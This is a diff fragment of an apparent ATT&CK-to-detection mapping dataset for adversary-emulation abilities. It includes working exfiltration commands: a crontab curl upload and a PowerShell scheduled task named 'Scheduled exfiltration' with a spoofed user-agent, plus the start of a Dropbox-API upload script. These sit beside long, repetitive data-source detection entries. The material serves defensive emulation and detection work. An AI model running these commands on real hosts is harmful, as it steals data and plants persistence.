+ "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1029", + "command_list": [ + "crontab -l > /tmp/origcron;\ncrontab -l > /tmp/mycron;\necho \"0 12 * * * curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\" >> /tmp/mycron;\ncrontab /tmp/mycron;\n", + "$commandString = '$fieldName = \\\"#{host.dir.compress}\";\n$filePath = \\\"#{host.dir.compress}\";\n$url = \\\"#{server}/file/upload\\\";\nAdd-Type -AssemblyName \\\"System.Net.Http\\\";\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n\n$xRequestIdHeader = \\\"X-Request-Id\\\";\n$xRequestIdField = $env:COMPUTERNAME + \\\"-#{paw}\\\";\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add($xRequestIdHeader, $xRequestIdField);\n\n$userAgentHeader = \\\"User-Agent\\\";\n$userAgentField = \\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\\\";\n$client.DefaultRequestHeaders.Add($userAgentHeader, $userAgentField);\n$result = $client.PostAsync($url, $content).Result;$result.EnsureSuccessStatusCode();';\n\n$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"$commandString\";\n$trigger = New-ScheduledTaskTrigger -Once -At 12pm;\n\nRegister-ScheduledTask -TaskName \"Scheduled exfiltration\" -Trigger $trigger -Action $action;\n" + ], + "commands": [ + { + "command": "crontab -l > /tmp/origcron;\ncrontab -l > /tmp/mycron;\necho \"0 12 * * * curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\" >> /tmp/mycron;\ncrontab /tmp/mycron;\n", + "source": "data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml", + "name": "This ability exfiltrates the staged directory at a scheduled time." + }, + { + "command": "$commandString = '$fieldName = \\\"#{host.dir.compress}\";\n$filePath = \\\"#{host.dir.compress}\";\n$url = \\\"#{server}/file/upload\\\";\nAdd-Type -AssemblyName \\\"System.Net.Http\\\";\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n\n$xRequestIdHeader = \\\"X-Request-Id\\\";\n$xRequestIdField = $env:COMPUTERNAME + \\\"-#{paw}\\\";\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add($xRequestIdHeader, $xRequestIdField);\n\n$userAgentHeader = \\\"User-Agent\\\";\n$userAgentField = \\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\\\";\n$client.DefaultRequestHeaders.Add($userAgentHeader, $userAgentField);\n$result = $client.PostAsync($url, $content).Result;$result.EnsureSuccessStatusCode();';\n\n$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"$commandString\";\n$trigger = New-ScheduledTaskTrigger -Once -At 12pm;\n\nRegister-ScheduledTask -TaskName \"Scheduled exfiltration\" -Trigger $trigger -Action $action;\n", + "source": "data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml", + "name": "This ability exfiltrates the staged directory at a scheduled time." + } + ], + "parsed_datasets": [ + { + "id": "110cea7a-5b03-4443-92ee-7ccefaead451", + "name": "Scheduled Exfiltration", + "description": "This ability exfiltrates the staged directory at a scheduled time.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1029", + "name": "Scheduled Transfer" + }, + "platforms": { + "linux": { + "sh": { + "command": "crontab -l > /tmp/origcron;\ncrontab -l > /tmp/mycron;\necho \"0 12 * * * curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\" >> /tmp/mycron;\ncrontab /tmp/mycron;\n", + "cleanup": "rm /tmp/mycron;\ncrontab /tmp/origcron;\nrm /tmp/origcron;\n" + } + }, + "windows": { + "psh": { + "command": "$commandString = '$fieldName = \\\"#{host.dir.compress}\";\n$filePath = \\\"#{host.dir.compress}\";\n$url = \\\"#{server}/file/upload\\\";\nAdd-Type -AssemblyName \\\"System.Net.Http\\\";\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n\n$xRequestIdHeader = \\\"X-Request-Id\\\";\n$xRequestIdField = $env:COMPUTERNAME + \\\"-#{paw}\\\";\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add($xRequestIdHeader, $xRequestIdField);\n\n$userAgentHeader = \\\"User-Agent\\\";\n$userAgentField = \\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\\\";\n$client.DefaultRequestHeaders.Add($userAgentHeader, $userAgentField);\n$result = $client.PostAsync($url, $content).Result;$result.EnsureSuccessStatusCode();';\n\n$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"$commandString\";\n$trigger = New-ScheduledTaskTrigger -Once -At 12pm;\n\nRegister-ScheduledTask -TaskName \"Scheduled exfiltration\" -Trigger $trigger -Action $action;\n", + "cleanup": "Unregister-ScheduledTask -TaskName \"Scheduled exfiltration\" -Confirm:$false;" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "100-200", + "Scheduled Tasks" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "100-200", + "Scheduled Tasks" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1567.002", + "command_list": [ + "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$TargetFilePath = \"/#{dropbox.target.dir}/$RemoteName\";\n$ApiKey = \"#{dropbox.api.key}\";\n\n$url = \"https://content.dropboxapi.com/2/files/upload\";\n\n$file = [IO.File]::ReadAllBytes($SourceFile);\n[net.httpWebRequest] $req = [net.webRequest]::create($url);\n\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }';\n$authorization = \"Bearer \" + $ApiKey;\n\n$req.method = \"POST\";\n$req.Headers.Add(\"Authorization\", $authorization);\n$req.Headers.Add(\"Dropbox-API-Arg\", $arg);\n$req.ContentType = 'application/octet-stream';\n$req.ContentLength = $file.length;\n$req.TimeOut = 50000;\n$req.KeepAlive = $true;\n$req.Headers.Add(\"Keep-Alive: 300\");\n$reqst = $req.getRequestStream();\n$reqst.write($file, 0, $file.length);\n$reqst.flush();\n$reqst.close();\n\n[net.httpWebResponse] $res = $req.getResponse();\n$resst = $res.getResponseStream();\n$sr = new-object IO.StreamReader($resst);\n$result = $sr.ReadToEnd();\n$result;\n$res.close();\n", + 